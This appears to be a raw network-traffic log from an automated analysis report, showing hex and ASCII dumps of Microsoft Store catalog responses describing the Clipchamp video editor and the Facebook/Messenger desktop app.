                                                                                                                                                                                    2023-01-05 07:59:14 UTC15449INData Raw: 34 61 34 35 2d 38 33 61 65 2d 62 62 36 64 38 65 31 31 36 33 35 35 22 2c 22 57 69 64 74 68 22 3a 31 39 32 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 33 38 38 34 39 36 32 33 37 36 30 35 32 36 38 37 37 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 32 30 32 37 36 38 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 35 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55
                                                                                                                                                                                    Data Ascii: 4a45-83ae-bb6d8e116355","Width":1920},{"FileId":"3038849623760526877","EISListingIdentifier":null,"BackgroundColor":"","Caption":"","FileSizeInBytes":2202768,"ForegroundColor":"","Height":1080,"ImagePositionInfo":"Desktop/5","ImagePurpose":"Screenshot","U
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15453INData Raw: 20 63 6f 6c 6f 72 73 2c 20 61 6e 64 20 77 61 74 65 72 6d 61 72 6b 2c 20 61 6e 64 20 61 64 64 20 74 68 65 6d 20 74 6f 20 61 6e 79 20 76 69 64 65 6f 20 75 73 69 6e 67 20 6f 75 72 20 62 72 61 6e 64 20 6b 69 74 2e 5c 6e 2d 20 45 64 69 74 20 63 6f 72 70 6f 72 61 74 65 20 76 69 64 65 6f 73 3a 20 53 6b 69 70 20 6c 6f 6e 67 20 65 6d 61 69 6c 73 20 61 6e 64 20 6d 61 6b 65 20 76 69 64 65 6f 73 20 77 69 74 68 20 74 68 65 20 77 65 62 63 61 6d 20 72 65 63 6f 72 64 65 72 20 6f 72 20 70 6f 6c 69 73 68 20 6d 65 65 74 69 6e 67 20 72 65 63 6f 72 64 69 6e 67 73 20 77 69 74 68 20 65 61 73 65 2e 5c 6e 5c 6e 49 6e 74 75 69 74 69 76 65 20 73 68 6f 72 74 63 75 74 73 20 68 65 6c 70 20 79 6f 75 20 65 64 69 74 20 66 61 73 74 65 72 3a 5c 6e 5c 6e 2d 20 52 65 73 69 7a 65 20 76 69 64
                                                                                                                                                                                    Data Ascii: colors, and watermark, and add them to any video using our brand kit.\n- Edit corporate videos: Skip long emails and make videos with the webcam recorder or polish meeting recordings with ease.\n\nIntuitive shortcuts help you edit faster:\n\n- Resize vid
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15457INData Raw: 61 6d 70 27 73 20 6f 6e 6c 69 6e 65 20 76 69 64 65 6f 20 65 64 69 74 6f 72 20 65 71 75 69 70 73 20 79 6f 75 20 77 69 74 68 20 65 73 73 65 6e 74 69 61 6c 20 65 64 69 74 69 6e 67 20 74 6f 6f 6c 73 2e 20 59 6f 75 20 63 61 6e 20 63 75 74 2c 20 74 72 69 6d 2c 20 63 72 6f 70 2c 20 72 6f 74 61 74 65 2c 20 73 70 6c 69 74 2c 20 6c 6f 6f 70 2c 20 7a 6f 6f 6d 20 69 6e 20 61 6e 64 20 6f 75 74 2c 20 73 70 65 65 64 20 75 70 20 6f 72 20 73 6c 6f 77 20 64 6f 77 6e 2c 20 61 64 64 20 6f 72 20 72 65 6d 6f 76 65 20 61 75 64 69 6f 20 61 6e 64 20 65 76 65 6e 20 61 64 64 20 66 69 6c 74 65 72 73 20 61 6e 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 20 74 6f 20 76 69 64 65 6f 73 2e 5c 6e 5c 6e 52 65 63 6f 72 64 20 79 6f 75 72 20 63 61 6d 65 72 61 20 61 6e 64 20 73 63 72 65 65 6e 3a 5c
                                                                                                                                                                                    Data Ascii: amp's online video editor equips you with essential editing tools. You can cut, trim, crop, rotate, split, loop, zoom in and out, speed up or slow down, add or remove audio and even add filters and transitions to videos.\n\nRecord your camera and screen:\
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15461INData Raw: 36 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 72 75 6e 46 75 6c 6c 54 72 75 73 74 22 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 73 74 6f 72 65 46 69 6c 74 65 72 2e 63 6f 72 65 2e 6e 6f 74 53 75 70 70 6f 72 74 65 64 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 36 30 38 31 32 30 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 39 32 39 32 31 36 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 41 70 70 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 43 6c 69 70 63 68 61 6d 70 2e 43 6c
                                                                                                                                                                                    Data Ascii: 6"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":1608120,"MaxInstallSizeInBytes":1929216,"PackageFormat":"AppxBundle","PackageFamilyName":"Clipchamp.Cl
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15465INData Raw: 31 33 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 79 78 7a 32 36 6e 68 79 7a 68 73 72 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 37 36 32 62 62 38 34 64 2d 64 38 33 66 2d 37 34 32 65 2d 66 35 36 35 2d 61 35 33 66 39 65 31 66 61 39 65 32 2d 4e 65 75 74 72 61 6c 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 32 30 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 32 30 38 38 39 38 35 36 30 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 30 39 37 30 34 37 38 35 39 32 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22
                                                                                                                                                                                    Data Ascii: 13.0_neutral_~_yxz26nhyzhsrt","PackageId":"762bb84d-d83f-742e-f565-a53f9e1fa9e2-Neutral","PackageRank":30020,"PlatformDependencies":[{"MaxTested":2814751208898560,"MinVersion":2814750970478592,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob"
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15469INData Raw: 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 54 65 61 6d 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 48 6f 6c 6f 67 72 61 70 68 69 63 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77
                                                                                                                                                                                    Data Ascii: inVersion":0,"PlatformName":"Windows.Team"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Xbox"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Holographic"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Window
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15473INData Raw: 65 65 64 62 61 63 6b 20 74 6f 20 66 65 61 74 75 72 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 77 65 27 6c 6c 20 62 65 20 68 61 70 70 79 20 74 6f 20 68 65 6c 70 2e 22 2c 22 53 6b 75 54 69 74 6c 65 22 3a 22 43 6c 69 70 63 68 61 6d 70 20 2d 20 56 69 64 65 6f 20 45 64 69 74 6f 72 22 2c 22 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 75 73 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 2c 22 44 5a 22 2c 22 41 52 22 2c 22 41 55 22 2c 22 41 54 22 2c 22 42 48 22 2c 22 42 44 22 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c
                                                                                                                                                                                    Data Ascii: eedback to feature requests and we'll be happy to help.","SkuTitle":"Clipchamp - Video Editor","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT",
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15477INData Raw: 34 37 35 30 39 37 30 34 37 38 35 39 32 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 62 75 6e 64 6c 65 64 50 61 63 6b 61 67 65 73 5c 22 3a 5b 5c 22 43 6c 69 70 63 68 61 6d 70 2e 43 6c 69 70 63 68 61 6d 70 5f 32 2e 35 2e 35 2e 30 5f 6e 65 75 74 72 61 6c 5f 5f 79 78 7a 32 36 6e 68 79 7a 68 73 72 74 5c 22 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 43 6c 69 70 63 68 61 6d
                                                                                                                                                                                    Data Ascii: 4750970478592,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"Clipchamp.Clipchamp_2.5.5.0_neutral__yxz26nhyzhsrt\"],\"content.isMain\":false,\"content.packageId\":\"Clipcham
                                                                                                                                                                                    2023-01-05 07:59:14 UTC15481INData Raw: 5b 22 4c 69 63 65 6e 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 4e 48 4b 48 4c 33 4e 44 42 38 33 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e
                                                                                                                                                                                    Data Ascii: ["License","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9NHKHL3NDB83","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Win


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    58192.168.2.44993220.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15482OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Facebook.317180B0BB486_8xx8rvfyw5nnt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: 5zVhwLb0Wkqwx3bh.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15482INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 27030
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:15 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: 514b4fc2-887f-4333-afc7-4e595eb702e6
                                                                                                                                                                                    MS-RequestId: 7a0a2f0f-4341-45aa-a1d9-bb6ea6e90bbc
                                                                                                                                                                                    MS-CV: 5zVhwLb0Wkqwx3bh.0.2.4.4008885786.2426317926.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: 5
                                                                                                                                                                                    MS-DocumentVersions: 9WZDNCRF0083|4405
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15483INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 57 5a 44 4e 43 52 46 30 30 38 33 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 33 2d 30 31 2d 30 33 54 31 37 3a 30 30 3a 35 39 2e 34 38 32 38 38 31 35 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 32 38 35 39 32 34 35 37 31 30 35 34 37 34 39 35 36 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43
                                                                                                                                                                                    Data Ascii: {"BigIds":["9WZDNCRF0083"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2023-01-03T17:00:59.4828815Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3028592457105474956","EISListingIdentifier":null,"BackgroundColor":"transparent","C
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15484INData Raw: 22 2c 22 57 69 64 74 68 22 3a 31 35 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 33 30 32 37 33 34 37 33 31 36 36 36 36 36 37 31 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 32 39 32 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 34 34 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 4f 54 76 55 33 77 32
                                                                                                                                                                                    Data Ascii: ","Width":150},{"FileId":"3063027347316666671","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":2292,"ForegroundColor":"","Height":44,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"OTvU3w2
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15485INData Raw: 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 39 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 30 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 6e 72 6e 59 32 74 4c 2b 50 43 6f 4a 70 33 33 39 4b 77 34 6a 76 67 54 61 31 6a 46 62 65 44 6d 6f 47 76 69 73 4c 76 47 4c 38 4e 51 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 34 37 35 31 38 2e 39 30 30 37 31 39 39 32 36 36 37 32 36 35 39 36 2e 39 35 38 38 31 35 32 66 2d 65 32 30 64 2d 34 33
                                                                                                                                                                                    Data Ascii: "ForegroundColor":"","Height":900,"ImagePositionInfo":"Desktop/0","ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"nrnY2tL+PCoJp339Kw4jvgTa1jFbeDmoGvisLvGL8NQ=","Uri":"//store-images.s-microsoft.com/image/apps.47518.9007199266726596.9588152f-e20d-43
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15486INData Raw: 75 33 70 69 78 56 50 48 34 44 30 38 55 32 32 76 6e 78 4f 59 59 4e 6b 4a 64 53 6f 57 6b 34 6a 64 32 6b 67 47 41 78 70 34 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 34 37 31 32 32 2e 39 30 30 37 31 39 39 32 36 36 37 32 36 35 39 36 2e 39 35 38 38 31 35 32 66 2d 65 32 30 64 2d 34 33 32 62 2d 39 38 34 33 2d 65 61 36 64 30 39 62 65 38 63 62 63 2e 36 33 32 64 64 62 30 38 2d 32 38 38 65 2d 34 32 61 37 2d 61 39 33 62 2d 31 61 37 62 37 31 39 66 31 31 34 63 22 2c 22 57 69 64 74 68 22 3a 31 34 34 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 31 31 35 32 39 32 31 35 30 34 36 39 37 39 34 31 31 35 34 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69
                                                                                                                                                                                    Data Ascii: u3pixVPH4D08U22vnxOYYNkJdSoWk4jd2kgGAxp4=","Uri":"//store-images.s-microsoft.com/image/apps.47122.9007199266726596.9588152f-e20d-432b-9843-ea6d09be8cbc.632ddb08-288e-42a7-a93b-1a7b719f114c","Width":1440},{"FileId":"1152921504697941154","EISListingIdentifi
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15487INData Raw: 39 31 39 65 61 65 2e 37 36 31 63 36 31 65 66 2d 31 64 64 38 2d 34 63 66 36 2d 62 38 65 34 2d 39 33 64 63 33 61 39 32 65 64 39 62 22 2c 22 57 69 64 74 68 22 3a 34 31 34 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 31 31 35 32 39 32 31 35 30 34 36 39 37 39 34 31 32 37 37 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 35 32 31 30 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 34 36 38 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f
                                                                                                                                                                                    Data Ascii: 919eae.761c61ef-1dd8-4cf6-b8e4-93dc3a92ed9b","Width":414},{"FileId":"1152921504697941277","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":15210,"ForegroundColor":"","Height":468,"ImagePositionInfo":"","ImagePurpo
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15488INData Raw: 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 35 37 37 32 38 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 32 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 4d 6f 62 69 6c 65 2f 30 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 63 77 4c 44 64 75 4a 59 43 36 4d 68 4b 4d 4d 30 30 4d 35 62 69 4d 4e 6f 41 58 61 68 74 34 45 76 74 4a 79 6a 67 76 69 79 56 54 55 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67
                                                                                                                                                                                    Data Ascii: parent","Caption":"","FileSizeInBytes":157728,"ForegroundColor":"","Height":1280,"ImagePositionInfo":"Mobile/0","ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"cwLDduJYC6MhKMM00M5biMNoAXaht4EvtJyjgviyVTU=","Uri":"//store-images.s-microsoft.com/imag
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15489INData Raw: 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 57 52 41 69 70 30 37 72 59 69 79 37 66 5a 56 48 35 4a 50 58 6b 36 35 43 65 68 52 58 33 59 5a 71 73 4e 70 74 2b 38 6a 43 70 36 59 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 34 31 38 35 2e 39 30 30 37 31 39 39 32 36 36 37 32 36 35 39 36 2e 39 35 38 38 31 35 32 66 2d 65 32 30 64 2d 34 33 32 62 2d 39 38 34 33 2d 65 61 36 64 30 39 62 65 38 63 62 63 2e 63 61 37 31 32 30 65 34 2d 34 66 64 35 2d 34 34 31 31 2d 62 32 32 37 2d 37 39 38 33 63 30 31 31 63 36 30 61 22 2c 22 57 69 64 74 68 22 3a
                                                                                                                                                                                    Data Ascii: "ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"WRAip07rYiy7fZVH5JPXk65CehRX3YZqsNpt+8jCp6Y=","Uri":"//store-images.s-microsoft.com/image/apps.4185.9007199266726596.9588152f-e20d-432b-9843-ea6d09be8cbc.ca7120e4-4fd5-4411-b227-7983c011c60a","Width":
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15490INData Raw: 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 38 35 39 2e 39 30 30 37 31 39 39 32 36 36 37 32 36 35 39 36 2e 34 33 36 32 33 36 66 65 2d 37 31 65 34 2d 34 62 36 31 2d 62 30 64 64 2d 33 32 37 66 36 63 61 66 62 63 33 34 2e 39 30 62 35 32 35 38 31 2d 61 64 38 63 2d 34 61 63 30 2d 38 33 34 31 2d 38 33 64 34 64 37 66 66 36 37 30 61 22 2c 22 57 69 64 74 68 22 3a 33 38 34 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 32 30 30 30 30 30 30 30 30 30 30 37 37 30 39 33 35 33 36 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 34 38 38 31 35 38 2c 22
                                                                                                                                                                                    Data Ascii: microsoft.com/image/apps.859.9007199266726596.436236fe-71e4-4b61-b0dd-327f6cafbc34.90b52581-ad8c-4ac0-8341-83d4d7ff670a","Width":3840},{"FileId":"2000000000077093536","EISListingIdentifier":null,"BackgroundColor":"","Caption":"","FileSizeInBytes":488158,"
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15491INData Raw: 22 50 72 6f 64 75 63 74 44 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 61 64 65 20 66 6f 72 20 62 69 67 20 73 63 72 65 65 6e 73 20 61 6e 64 20 63 6c 6f 73 65 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 2e 20 47 65 74 20 61 63 63 65 73 73 20 74 6f 20 66 72 65 65 2a 20 74 65 78 74 69 6e 67 2c 20 61 6e 64 20 68 69 67 68 2d 71 75 61 6c 69 74 79 20 76 6f 69 63 65 20 26 20 76 69 64 65 6f 20 63 68 61 74 20 62 75 69 6c 74 20 73 70 65 63 69 66 69 63 61 6c 6c 79 20 66 6f 72 20 64 65 73 6b 74 6f 70 2e 5c 72 5c 6e 5c 72 5c 6e 4d 41 44 45 20 46 4f 52 20 44 45 53 4b 54 4f 50 2c 20 4d 41 44 45 20 46 4f 52 20 59 4f 55 5c 72 5c 6e 54 79 70 65 20 65 76 65 6e 20 66 61 73 74 65 72 2c 20 6d 75 6c 74 69 74 61 73 6b 20 77 68 69 6c 65 20 76 69 64 65 6f 20 63 68 61 74 74 69 6e 67 20 73 6f
                                                                                                                                                                                    Data Ascii: "ProductDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE FOR YOU\r\nType even faster, multitask while video chatting so
